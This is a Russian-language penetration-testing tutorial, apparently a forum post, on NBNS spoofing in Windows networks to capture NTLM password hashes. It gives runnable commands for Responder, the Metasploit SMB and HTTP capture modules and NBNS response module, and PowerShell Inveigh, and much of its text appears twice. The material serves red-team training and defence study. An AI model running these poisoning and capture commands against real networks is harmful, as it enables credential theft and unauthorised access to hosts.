Служба имен Netbios (NBT-NS) используется в сетях Windows для связи между хостами. Системы будут использовать эту службу при разрешении имен через LHOSTS и DNS. Злоупотребление этим сервисом для выполнения атаки «человек посередине» - это распространенная тактика, которая широко используется тестерами на проникновение и красными командами, чтобы получить первоначальную точку для закрепления внутри системы. Полученные хэши паролей могут быть взломаны в автономном режиме или могут быть использованы в сочетании с ретрансляцией для достижения законного доступа к хостам.
Responder
Trustwave SpiderLabs разработал Responder для реализации спуфинговой атаки NBNS. Запуск инструмента со следующими аргументами инициирует отравление различными протоколами, требующими аутентификации, такими как SMB, HTTP и т. д.
Спуфинг NBNS - Responder
Когда узел в сети отправил широковещательную рассылку NetBIOS, компьютер злоумышленника отправит поддельный ответ, и узел попытается пройти аутентификацию на ресурсе, используя хэш-пароль NTLM.
NBNS Spoofing - Хеши через ответчик
Metasploit
Спуфинг NBNS может быть реализован через Metasploit Framework с использованием различных модулей, которые могут захватить вызов аутентификации при согласовании для протоколов, таких как SMB и HTTP. Для захвата хэша пароля через SMB необходимо использовать следующий модуль:
Metasploit - SMB-сервер
Модуль для захвата проверки подлинности NTLM через HTTP можно настроить следующим образом:
Metasploit - HTTP-сервер
Следующий модуль отправит ответы службы имен NetBIOS на хосты, которые будут отправлять широковещательные запросы NetBIOS по сети.
Metasploit - модуль ответа NBNS
Когда пользователь сети попытается использовать широковещательный запрос NetBIOS для идентификации ресурса, трафик будет перенаправлен на хост злоумышленника, и хеш пароля будет получен.
NBNS Spoofing - Хеши через Metasploit
PowerShell
Спуфинг NBNS - PowerShell Inveigh
Хэш пароля пользователя будет записан, как Responder и Metasploit.
NBNS Spoofing - Хеши через Inveigh
Ссылки
Responder
Trustwave SpiderLabs разработал Responder для реализации спуфинговой атаки NBNS. Запуск инструмента со следующими аргументами инициирует отравление различными протоколами, требующими аутентификации, такими как SMB, HTTP и т. д.
Код:
responder -I eth0 -e 10.0.0.2 -b -A -v
Спуфинг NBNS - Responder
Когда узел в сети отправил широковещательную рассылку NetBIOS, компьютер злоумышленника отправит поддельный ответ, и узел попытается пройти аутентификацию на ресурсе, используя хэш-пароль NTLM.
NBNS Spoofing - Хеши через ответчик
Metasploit
Спуфинг NBNS может быть реализован через Metasploit Framework с использованием различных модулей, которые могут захватить вызов аутентификации при согласовании для протоколов, таких как SMB и HTTP. Для захвата хэша пароля через SMB необходимо использовать следующий модуль:
Код:
use auxiliary/server/capture/smb
set SRVHOST 10.0.0.2
set cainpwfile /tmp/cain-smb
set johnpwfile /tmp/john-smb
set logfile /tmp/logfile
run
Metasploit - SMB-сервер
Модуль для захвата проверки подлинности NTLM через HTTP можно настроить следующим образом:
Код:
use auxiliary/server/capture/http_ntlm
set SRVHOST 10.0.0.2
set SRVPORT 80
set URIPATH /
set cainpwfile /tmp/cain-http
set johnpwfile /tmp/john-http
set logfile /tmp/logfile
run
Metasploit - HTTP-сервер
Следующий модуль отправит ответы службы имен NetBIOS на хосты, которые будут отправлять широковещательные запросы NetBIOS по сети.
Код:
use auxiliary/spoof/nbns/nbns_response
set SPOOFIP 10.0.0.2
run
Metasploit - модуль ответа NBNS
Когда пользователь сети попытается использовать широковещательный запрос NetBIOS для идентификации ресурса, трафик будет перенаправлен на хост злоумышленника, и хеш пароля будет получен.
NBNS Spoofing - Хеши через Metasploit
PowerShell
Ссылка скрыта от гостей
реализовал эту атаку в сценарии PowerShell под названием Inveigh . Этот скрипт является частью Empire, PoshC2 и других инструментов и может быть настроен следующим образом:
Код:
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y
Спуфинг NBNS - PowerShell Inveigh
Хэш пароля пользователя будет записан, как Responder и Metasploit.
NBNS Spoofing - Хеши через Inveigh
Ссылки
-
Ссылка скрыта от гостей
-
Ссылка скрыта от гостей
- Kevin-Robertson/Inveigh
Ссылка скрыта от гостей